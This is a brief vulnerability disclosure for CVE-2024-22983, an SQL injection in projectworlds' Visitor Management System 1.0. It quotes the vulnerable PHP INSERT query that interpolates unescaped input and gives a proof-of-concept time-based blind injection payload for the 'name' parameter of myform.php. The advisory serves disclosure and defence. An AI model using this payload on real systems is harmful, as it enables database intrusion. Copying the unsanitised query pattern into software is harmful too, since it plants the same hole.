Name: Projectworlds Visitor Management System
Version: 1.0
CVE-ID: CVE-2024-22983
Description:
An SQL injection Vulnerability in projectworlds' Visitor Management System
Due to lack of input validation, an attacker can execute SQL commands via the 'name' parameter in the myform.php endpoint.
The affected code is structured like this:
$sql = "INSERT INTO info_visitor(Name, Contact, Purpose, meetingTo, day, month, year, Date, TimeIN, ReceiptID,Status, Comment,registeredBy) VALUES ('$name','$cno','$p', '$meet', '$day', '$month', '$year', '$date', '$timein','$rid','ONLINE', '$comment', '$user_')";
Looking at the code, an attaker can inject SQL commands by appending an apostrophe (') in any of these parameters, including the $name parameter.
In this PoC, the payload pauses the application's execution for 5 seconds.
name=test'''||(SELECT 0x704b7952 WHERE 7337=7337 AND (SELECT 2582 FROM (SELECT(SLEEP(5)))kuBi))||'